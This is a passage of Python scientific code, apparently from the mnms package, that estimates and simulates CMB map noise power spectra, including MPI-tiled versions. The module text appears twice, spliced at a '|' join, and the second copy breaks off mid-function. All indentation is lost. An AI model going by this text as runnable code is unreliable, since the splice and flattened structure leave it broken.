Inverse-variance maps for imap with shape([num_arrays, num_splits, 1,], ny, nx), by default None
mask : enmap.ndmap, optional
        A map-space window to apply to imap before calculating power spectra, by default None
N : int, optional
Perform a rolling average over the spectra with this width in ell, by default 5
lmax : int, optional
Bandlimit of measured spectra, by default 1000
Returns
-------
enmap.ndmap
A set of power spectra from the crosses of array, pol pairs. Only saves upper-triangular matrix
elements, so e.g. if 2 arrays and 3 pols, output shape is (21, lmax+1)
"""
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
num_arrays, num_splits, num_pol = imap.shape[:3]
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# get the mask, pixsizemap, and initialized output
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
pmap = enmap.pixsizemap(mask.shape, mask.wcs)
Nl_1d = np.zeros([nspec, lmax+1], dtype=imap.dtype) # upper triangular
ls = np.arange(lmax+1)
# get alms of each array, split, pol
print('Measuring alms of each map')
    alms = []  # one alm per (array, split, pol); reshaped below
for map_index in range(num_arrays):
for split in range(num_splits):
for pol_index in range(num_pol):
alms.append(curvedsky.map2alm(imap[map_index, split, pol_index]*mask, lmax=lmax))
alms = np.array(alms)
alms = alms.reshape(*imap.shape[:3], -1)
# iterate over spectra
for i in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(i, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
print(f'Measuring cross between (array{map_index_1}, pol{pol_index_1}) and (array{map_index_2}, pol{pol_index_2})')
# get cross power
power = 0
for split in range(num_splits):
alm_a = alms[map_index_1, split, pol_index_1]
alm_b = alms[map_index_2, split, pol_index_2]
power += curvedsky.alm2cl(alm_a, alm_b)
power /= num_splits
# smooth
power[~np.isfinite(power)] = 0
if N > 0:
power = utils.rolling_average(power, N)
bins = np.arange(len(power))
power = maps.interp(bins, power)(ls)
power[:2] = 0
# assign
Nl_1d[i] = power
# normalize by area and return final object
w2 = np.sum((mask**2)*pmap) / np.pi / 4.
return enmap.ndmap(Nl_1d, wcs=imap.wcs) / w2
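# worked example of the flat upper-triangle packing above: with num_arrays=2
# and num_pol=3, ncomp = 6 and nspec = triangular(6) = 6*7/2 = 21, matching
# the (21, lmax+1) output shape quoted in the docstring; utils.triu_pos(i, 6)
# recovers the (row, col) pair of each entry, e.g. i=0 is the (0, 0)
# auto-spectrum under the row-major upper-triangle ordering assumed here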
def get_iso_curvedsky_noise_sim(covar, ivar=None, flat_triu_axis=0, oshape=None, num_arrays=None, lfunc=None, split=None, seed=None, seedgen_args=None):
"""Get a noise realization from the 1D global, isotropic power spectra generated in get_iso_curvedsky_noise_covar.
If power spectra were prewhitened with ivar maps, same ivar maps must be passed to properly weight sims in
pixel space.
Parameters
----------
covar : enmap.ndmap
1D global, isotropic power spectra to draw sim from. Shape must be (nspec, lmax+1), where
nspec is a triangular number
ivar : enmap.ndmap, optional
Inverse-variance map to weight output sim by in pixel-space with
shape([num_arrays, num_splits, 1,], ny, nx), by default None
flat_triu_axis : int, optional
Axis of covar that carries the flattened upper-triangle of the covariance matrix, by default 0
oshape : at-least-length-2 iterable, optional
If ivar is not passed, the shape of the sim, by default None
num_arrays : int, optional
If ivar is not passed the number of arrays that generated covar, by default None
lfunc : function, optional
A transfer function to modulate sim power in harmonic space, by default None
split : int, optional
The index of ivar corresponding to the desired split, by default None
seed : Random seed for spectra, optional
If seedgen_args is None then the maps will have this seed, by default None
    seedgen_args : length-3 or length-4 tuple, optional
        A tuple containing ([set_idx,] sim_idx, data_model, qid) to pass to
        seedgen.get_tiled_noise_seed(...); a length-3 tuple has split prepended as the set index. By default None
Returns
-------
enmap.ndmap
A shape([num_arrays, 1, num_pol,] ny, nx) 1D global, isotropic noise simulation of given split in given array
"""
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
oshape = ivar.shape[-2:]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
assert oshape is not None, 'If ivar not passed, must pass oshape as arg'
oshape = oshape[-2:]
# get component shapes and reshape covar
# assumes covar flat_triu_axis is axis 0
ncomp = utils.triangular_idx(covar.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# get the 1D PS from covar
wcs = covar.wcs
covar = utils.from_flat_triu(covar, axis1=0, axis2=1, flat_triu_axis=flat_triu_axis)
covar = enmap.ndmap(covar, wcs=wcs)
print(f'Shape: {covar.shape}')
# apply a filter if passed
if lfunc is not None:
covar *= lfunc(np.arange(covar.shape[-1]))
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid:
seedgen_args = seedgen_args + (LARGE_SCALE_TILE_NUM,) # dummy "tile_idx" for full sky random draw is 103,094
seed = seedgen.get_tiled_noise_seed(*seedgen_args)
print(f'Seed: {seed}')
# generate the noise and sht to real space
oshape = (ncomp,) + oshape
omap = curvedsky.rand_map(oshape, covar.wcs, covar, lmax=covar.shape[-1], dtype=covar.dtype, seed=seed)
omap = omap.reshape((num_arrays, 1, num_pol) + oshape[-2:])
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0 ] /= np.sqrt(ivar[ivar != 0])
return omap
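# minimal sketch of the covar -> sim round trip; imap, ivar and mask are
# hypothetical inputs of the shapes documented above
def _demo_iso_noise_pipeline(imap, ivar, mask):
    covar = get_iso_curvedsky_noise_covar(imap, ivar=ivar, mask=mask, N=5, lmax=1000)
    # draw one realization of split 0, unwhitened by the same ivar
    return get_iso_curvedsky_noise_sim(covar, ivar=ivar, split=0, seed=42)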
def get_tiled_noise_covsqrt_mpi(imap, ivar=None, mask=None, width_deg=4., height_deg=4., delta_ell_smooth=400, ledges=None,
tiled_mpi_manager=None, verbose=True):
'''Generate the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
# filter map prior to tiling, get the c_ells
# imap is masked here, as part of the filtering
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
if ledges is None:
ledges = np.arange(0, 10_000, maps.minimum_ell(imap.shape, imap.wcs)+1)
mask = mask.astype(imap.dtype)
imap, cov_1D = utils.ell_flatten(imap, mask=mask, ledges=ledges, return_cov=True)
# get the tiled data, tiled mask
imap = tiled_ndmap(imap, width_deg=width_deg, height_deg=height_deg)
sq_f_sky = imap.set_unmasked_tiles(mask, return_sq_f_sky=True)
imap = imap.to_tiled()
# # explicitly passing tiled=False and self.ishape will check that mask.shape and imap.ishape are compatible
# mask = imap.sametiles(mask, tiled=False).to_tiled()
else:
imap = None
# mask = None
sq_f_sky = None
# parallel code
imap = tiled_mpi_manager.Scatterv_tiled_ndmap(imap)
# mask = tiled_mpi_manager.Scatterv_tiled_ndmap(mask)
apod = imap.apod()
sq_f_sky = tiled_mpi_manager.Scatterv(sq_f_sky)
# # serial code
# if tiled_mpi_manager.is_root:
# my, mx = mcm.get_vecs_from_outer_mask(apod)
# invmcm = mcm.get_inv_mcm(my, arr2=mx, verbose=verbose)
# else:
# invmcm = None
# # parallel code
# invmcm = tiled_mpi_manager.Bcast(invmcm)
# get component shapes
num_arrays, num_splits, num_pol = imap.shape[1:4] # shape is (num_tiles, num_arrays, num_splits, num_pol, ...)
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# make the output PS map. imap.shape[-2:] is the tile shape
omap = np.zeros((imap.num_tiles, nspec) + imap.shape[-2:], dtype=imap.dtype)
# quick serial code
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Splits: {num_splits}, Number of Pols.: {num_pol}')
# parallel code
# cycle through the tiles
for i, n in enumerate(imap.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, imap.numx*imap.numy-1))
# get 2d tile geometry and modlmap, if the declination has changed
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change
_, ewcs = imap.get_tile_geometry(n)
# if i == 0:
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# else:
# if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# prev_ewcs = ewcs
# get the 2d tile PS, shape is (num_arrays, num_splits, num_pol, ny, nx)
# so trace over component -4
# this normalization is different than DR4 but avoids the need to save num_splits metadata, and we
# only ever simulate splits anyway...
smap = enmap.fft(enmap.ndmap(imap[i]*apod, wcs=ewcs), normalize='phys')
smap = np.einsum('...miayx,...nibyx->...manbyx', smap, np.conj(smap)).real / num_splits
# # decouple mcm
# if verbose:
# print('Decoupling modes')
# smap = np.einsum('...YXyx,...yx->...YX', invmcm, smap)
if verbose:
print(f'Shape: {smap.shape}')
# iterate over spectra
for j in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(j, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
# whether we are on the main diagonal
diag = comp1 == comp2
# get this 2D PS and apply correct geometry for this tile
power = smap[map_index_1, pol_index_1, map_index_2, pol_index_2]
power = enmap.ndmap(power, wcs=ewcs)
# # smooth the power spectrum. only use radial fit and log for autos
# # cross including intensity have atmospheric noise to higher ell
# if pol_index_1 == 0 or pol_index_2 == 0:
# lmin = 300
# lknee_guess = 3000
# else:
# lmin = 30
# lknee_guess = 500
# smooth the 2D PS
if delta_ell_smooth > 0:
power = covtools.smooth_ps_grid_uniform(power, delta_ell_smooth, diag=diag)
# skip smoothing if delta_ell_smooth=0 is passed as arg
elif delta_ell_smooth == 0:
if verbose:
print('Not smoothing')
else:
raise ValueError('delta_ell_smooth must be >= 0')
# update output 2D PS map
smap[map_index_1, pol_index_1, map_index_2, pol_index_2] = power
if not diag: # symmetry
smap[map_index_2, pol_index_2, map_index_1, pol_index_1] = power
# correct for f_sky from mask and apod windows
smap /= sq_f_sky[i]
# take covsqrt of current power, need to reshape so prepended dimensions are 2x2
smap = enmap.multi_pow(smap.reshape((ncomp, ncomp) + smap.shape[-2:]), 0.5, axes=(-4,-3))
# get upper triu of the covsqrt for efficient disk-usage
omap[i] = utils.to_flat_triu(smap, axis1=0, axis2=1, flat_triu_axis=0)
omap = imap.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# serial code
if tiled_mpi_manager.is_root:
return omap, ledges, cov_1D
    else:
        # match the three-element return signature of the root process
        return None, None, None
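# minimal sketch of the tiled covsqrt -> sim round trip; the inputs are
# hypothetical, and get_tiled_noise_sim_mpi (defined below) resolves at call
# time; under MPI every rank calls both functions, and non-root ranks get None
def _demo_tiled_noise_pipeline(imap, ivar, mask, manager=None):
    covsqrt, ledges, cov_1D = get_tiled_noise_covsqrt_mpi(
        imap, ivar=ivar, mask=mask, tiled_mpi_manager=manager)
    return get_tiled_noise_sim_mpi(
        covsqrt, ivar=ivar, ledges=ledges, cov_1D=cov_1D, split=0,
        tiled_mpi_manager=manager)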
def get_tiled_noise_sim_mpi(covsqrt, ivar=None, flat_triu_axis=1, num_arrays=None, tile_lfunc=None, ledges=None, cov_1D=None,
split=None, seed=None, seedgen_args=None, lowell_seed=False, tiled_mpi_manager=None, verbose=True):
'''Generate a sim from the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
t0 = time.time()
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
if cov_1D is not None:
assert ledges is not None, 'Must pass ledges if passing cov_1D to filter'
assert len(ledges) == cov_1D.shape[-1] + 1, 'Must be n_ell+1 ledges'
assert covsqrt.tiled, 'Covsqrt must be tiled'
t1 = time.time(); print(f'Init time: {np.round(t1-t0, 3)}')
else:
covsqrt = None
num_arrays = None
# parallel code
covsqrt = tiled_mpi_manager.Scatterv_tiled_ndmap(covsqrt)
num_arrays = tiled_mpi_manager.bcast(num_arrays)
# get component shapes
ncomp = utils.triangular_idx(covsqrt.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# make the output sim map. covsqrt.shape[-2:] is the tile shape
omap = np.zeros((covsqrt.num_tiles, num_arrays, 1, num_pol) + covsqrt.shape[-2:], dtype=covsqrt.dtype)
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Pols.: {num_pol}')
# cycle through the tiles
for i, n in enumerate(covsqrt.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, covsqrt.numx*covsqrt.numy-1))
# get 2d tile geometry
eshape, ewcs = covsqrt.get_tile_geometry(n)
# get the 2D PS from covsqrt
# subtract 1 from flat_triu_axis since we are doing covsqrt[i]
smap = utils.from_flat_triu(covsqrt[i], axis1=0, axis2=1, flat_triu_axis=flat_triu_axis-1)
if verbose:
print(f'Shape: {smap.shape}')
# apply a filter if passed, and if declination has changed build new filter.
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change.
# since modifying modes, not PS, use lfunc(...)**0.5; ie lfunc defines how one would modify
# the PS the modes are drawn from
if tile_lfunc is not None:
if i == 0:
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
else:
if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
prev_ewcs = ewcs
smap *= f_ell
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid
seedgen_args_tile = seedgen_args + (n,)
seed = seedgen.get_tiled_noise_seed(*seedgen_args_tile, lowell_seed=lowell_seed)
if verbose:
print(f'Seed: {seed}')
# generate the noise and fft to real space
if seed is not None:
np.random.seed(seed)
# determine dtype
if np.dtype(covsqrt.dtype).itemsize == 4:
rand_dtype = np.complex64
elif np.dtype(covsqrt.dtype).itemsize == 8:
rand_dtype = np.complex128
else:
raise TypeError('Only float32 and float64 implemented for now')
# simulate
randn = enmap.rand_gauss_harm((ncomp,) + smap.shape[-2:], ewcs).astype(rand_dtype) # stuck with this casting
smap = enmap.map_mul(smap, randn)
smap = enmap.ifft(smap, normalize='phys').real
smap = smap.reshape((num_arrays, 1, num_pol) + smap.shape[-2:]) # add a dimension for split
# update output map
omap[i] = smap
omap = covsqrt.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# must untile serially
if tiled_mpi_manager.is_root:
t2 = time.time(); print(f'Tile sim time: {np.round(t2-t1, 3)}')
omap = omap.from_tiled(power=0.5, return_as_enmap=False)
t3 = time.time(); print(f'Stitch time: {np.round(t3-t2, 3)}')
# determine whether to filter
if tiled_mpi_manager.is_root:
to_filter = cov_1D is not None
else:
to_filter = None
to_filter = tiled_mpi_manager.bcast(to_filter)
# prepare omap for parallel filtering, if necessary
if to_filter:
if tiled_mpi_manager.is_root:
assert (num_arrays, num_pol) == cov_1D.shape[:-1], 'cov_1D shape does not match (num_arrays, num_pol, ...)'
assert (num_arrays, 1, num_pol) == omap.shape[:-2], 'omap shape does not match (num_arrays, 1, num_pol, ...)'
cov_1D = cov_1D.reshape(-1, *cov_1D.shape[-1:])
omap = omap.reshape(-1, *omap.shape[-2:])
ledges = tiled_mpi_manager.Bcast(ledges)
cov_1D = tiled_mpi_manager.Scatterv(cov_1D)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(omap)
else:
ledges = tiled_mpi_manager.Bcast(None)
cov_1D = tiled_mpi_manager.Scatterv(None)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(None)
# do filtering in parallel to save a little time, can only scatter maps to filter unfortunately
for i in range(len(cov_1D)):
ilfunc = utils.interp1d_bins(ledges, cov_1D[i], bounds_error=False)
olfunc = lambda l: np.sqrt(ilfunc(l))
omap[i] = utils.ell_filter(omap[i], olfunc)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# do ivar-weighting serially
if tiled_mpi_manager.is_root:
# reshape omap back to (num_arrays, 1, num_pol, ...)
omap = omap.reshape(num_arrays, 1, num_pol, *omap.shape[-2:]).to_ndmap()
t4 = time.time(); print(f'Filter time: {np.round(t4-t3, 3)}')
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0] /= np.sqrt(ivar[ivar != 0])
t5 = time.time(); print(f'Ivar-weight time: {np.round(t5-t4, 3)}')
return omap
else:
return None | from orphics import maps
from pixell import enmap, curvedsky, wcsutils
import healpy as hp
from mnms import covtools, utils, mpi
from mnms.tiled_ndmap import tiled_ndmap
import astropy.io.fits as pyfits
import numpy as np
from math import ceil
import matplotlib.pyplot as plt
import time
seedgen = utils.seed_tracker
# hardcoded constants
LARGE_SCALE_TILE_NUM = 103_094
def get_iso_curvedsky_noise_covar(imap, ivar=None, mask=None, N=5, lmax=1000):
"""Get the 1D global, isotropic power spectra to draw sims from later. Ivar maps, if passed
are used to pre-whiten the maps in pixel-space by their high-ell white noise level prior to
measuring power spectra.
Parameters
----------
imap : enmap.ndmap
Map with shape ([num_arrays, num_splits, num_pol,] ny, nx)
ivar : enmap.ndmap, optional
Inverse-variance maps for imap with shape([num_arrays, num_splits, 1,], ny, nx), by default None
mask : enmap.ndmap, optional
        A map-space window to apply to imap before calculating power spectra, by default None
N : int, optional
Perform a rolling average over the spectra with this width in ell, by default 5
lmax : int, optional
Bandlimit of measured spectra, by default 1000
Returns
-------
enmap.ndmap
A set of power spectra from the crosses of array, pol pairs. Only saves upper-triangular matrix
elements, so e.g. if 2 arrays and 3 pols, output shape is (21, lmax+1)
"""
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
num_arrays, num_splits, num_pol = imap.shape[:3]
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# get the mask, pixsizemap, and initialized output
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
pmap = enmap.pixsizemap(mask.shape, mask.wcs)
Nl_1d = np.zeros([nspec, lmax+1], dtype=imap.dtype) # upper triangular
ls = np.arange(lmax+1)
# get alms of each array, split, pol
print('Measuring alms of each map')
    alms = []  # one alm per (array, split, pol); reshaped below
for map_index in range(num_arrays):
for split in range(num_splits):
for pol_index in range(num_pol):
alms.append(curvedsky.map2alm(imap[map_index, split, pol_index]*mask, lmax=lmax))
alms = np.array(alms)
alms = alms.reshape(*imap.shape[:3], -1)
# iterate over spectra
for i in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(i, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
print(f'Measuring cross between (array{map_index_1}, pol{pol_index_1}) and (array{map_index_2}, pol{pol_index_2})')
# get cross power
power = 0
for split in range(num_splits):
alm_a = alms[map_index_1, split, pol_index_1]
alm_b = alms[map_index_2, split, pol_index_2]
power += curvedsky.alm2cl(alm_a, alm_b)
power /= num_splits
# smooth
power[~np.isfinite(power)] = 0
if N > 0:
power = utils.rolling_average(power, N)
bins = np.arange(len(power))
power = maps.interp(bins, power)(ls)
power[:2] = 0
# assign
Nl_1d[i] = power
# normalize by area and return final object
w2 = np.sum((mask**2)*pmap) / np.pi / 4.
return enmap.ndmap(Nl_1d, wcs=imap.wcs) / w2
def get_iso_curvedsky_noise_sim(covar, ivar=None, flat_triu_axis=0, oshape=None, num_arrays=None, lfunc=None, split=None, seed=None, seedgen_args=None):
"""Get a noise realization from the 1D global, isotropic power spectra generated in get_iso_curvedsky_noise_covar.
If power spectra were prewhitened with ivar maps, same ivar maps must be passed to properly weight sims in
pixel space.
Parameters
----------
covar : enmap.ndmap
1D global, isotropic power spectra to draw sim from. Shape must be (nspec, lmax+1), where
nspec is a triangular number
ivar : enmap.ndmap, optional
Inverse-variance map to weight output sim by in pixel-space with
shape([num_arrays, num_splits, 1,], ny, nx), by default None
flat_triu_axis : int, optional
Axis of covar that carries the flattened upper-triangle of the covariance matrix, by default 0
oshape : at-least-length-2 iterable, optional
If ivar is not passed, the shape of the sim, by default None
num_arrays : int, optional
If ivar is not passed the number of arrays that generated covar, by default None
lfunc : function, optional
A transfer function to modulate sim power in harmonic space, by default None
split : int, optional
The index of ivar corresponding to the desired split, by default None
seed : Random seed for spectra, optional
If seedgen_args is None then the maps will have this seed, by default None
    seedgen_args : length-3 or length-4 tuple, optional
        A tuple containing ([set_idx,] sim_idx, data_model, qid) to pass to
        seedgen.get_tiled_noise_seed(...); a length-3 tuple has split prepended as the set index. By default None
Returns
-------
enmap.ndmap
A shape([num_arrays, 1, num_pol,] ny, nx) 1D global, isotropic noise simulation of given split in given array
"""
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
oshape = ivar.shape[-2:]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
assert oshape is not None, 'If ivar not passed, must pass oshape as arg'
oshape = oshape[-2:]
# get component shapes and reshape covar
# assumes covar flat_triu_axis is axis 0
ncomp = utils.triangular_idx(covar.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# get the 1D PS from covar
wcs = covar.wcs
covar = utils.from_flat_triu(covar, axis1=0, axis2=1, flat_triu_axis=flat_triu_axis)
covar = enmap.ndmap(covar, wcs=wcs)
print(f'Shape: {covar.shape}')
# apply a filter if passed
if lfunc is not None:
covar *= lfunc(np.arange(covar.shape[-1]))
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid:
seedgen_args = seedgen_args + (LARGE_SCALE_TILE_NUM,) # dummy "tile_idx" for full sky random draw is 103,094
seed = seedgen.get_tiled_noise_seed(*seedgen_args)
print(f'Seed: {seed}')
# generate the noise and sht to real space
oshape = (ncomp,) + oshape
omap = curvedsky.rand_map(oshape, covar.wcs, covar, lmax=covar.shape[-1], dtype=covar.dtype, seed=seed)
omap = omap.reshape((num_arrays, 1, num_pol) + oshape[-2:])
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0 ] /= np.sqrt(ivar[ivar != 0])
return omap
def get_tiled_noise_covsqrt_mpi(imap, ivar=None, mask=None, width_deg=4., height_deg=4., delta_ell_smooth=400, ledges=None,
tiled_mpi_manager=None, verbose=True):
'''Generate the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
# filter map prior to tiling, get the c_ells
# imap is masked here, as part of the filtering
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
if ledges is None:
ledges = np.arange(0, 10_000, maps.minimum_ell(imap.shape, imap.wcs)+1)
mask = mask.astype(imap.dtype)
imap, cov_1D = utils.ell_flatten(imap, mask=mask, ledges=ledges, return_cov=True)
# get the tiled data, tiled mask
imap = tiled_ndmap(imap, width_deg=width_deg, height_deg=height_deg)
sq_f_sky = imap.set_unmasked_tiles(mask, return_sq_f_sky=True)
imap = imap.to_tiled()
# # explicitly passing tiled=False and self.ishape will check that mask.shape and imap.ishape are compatible
# mask = imap.sametiles(mask, tiled=False).to_tiled()
else:
imap = None
# mask = None
sq_f_sky = None
# parallel code
imap = tiled_mpi_manager.Scatterv_tiled_ndmap(imap)
# mask = tiled_mpi_manager.Scatterv_tiled_ndmap(mask)
apod = imap.apod()
sq_f_sky = tiled_mpi_manager.Scatterv(sq_f_sky)
# # serial code
# if tiled_mpi_manager.is_root:
# my, mx = mcm.get_vecs_from_outer_mask(apod)
# invmcm = mcm.get_inv_mcm(my, arr2=mx, verbose=verbose)
# else:
# invmcm = None
# # parallel code
# invmcm = tiled_mpi_manager.Bcast(invmcm)
# get component shapes
num_arrays, num_splits, num_pol = imap.shape[1:4] # shape is (num_tiles, num_arrays, num_splits, num_pol, ...)
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# make the output PS map. imap.shape[-2:] is the tile shape
omap = np.zeros((imap.num_tiles, nspec) + imap.shape[-2:], dtype=imap.dtype)
# quick serial code
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Splits: {num_splits}, Number of Pols.: {num_pol}')
# parallel code
# cycle through the tiles
for i, n in enumerate(imap.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, imap.numx*imap.numy-1))
# get 2d tile geometry and modlmap, if the declination has changed
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change
_, ewcs = imap.get_tile_geometry(n)
# if i == 0:
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# else:
# if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# prev_ewcs = ewcs
# get the 2d tile PS, shape is (num_arrays, num_splits, num_pol, ny, nx)
# so trace over component -4
# this normalization is different than DR4 but avoids the need to save num_splits metadata, and we
# only ever simulate splits anyway...
smap = enmap.fft(enmap.ndmap(imap[i]*apod, wcs=ewcs), normalize='phys')
smap = np.einsum('...miayx,...nibyx->...manbyx', smap, np.conj(smap)).real / num_splits
# # decouple mcm
# if verbose:
# print('Decoupling modes')
# smap = np.einsum('...YXyx,...yx->...YX', invmcm, smap)
if verbose:
print(f'Shape: {smap.shape}')
# iterate over spectra
for j in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(j, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
# whether we are on the main diagonal
diag = comp1 == comp2
# get this 2D PS and apply correct geometry for this tile
power = smap[map_index_1, pol_index_1, map_index_2, pol_index_2]
power = enmap.ndmap(power, wcs=ewcs)
# # smooth the power spectrum. only use radial fit and log for autos
# # cross including intensity have atmospheric noise to higher ell
# if pol_index_1 == 0 or pol_index_2 == 0:
# lmin = 300
# lknee_guess = 3000
# else:
# lmin = 30
# lknee_guess = 500
# smooth the 2D PS
if delta_ell_smooth > 0:
power = covtools.smooth_ps_grid_uniform(power, delta_ell_smooth, diag=diag)
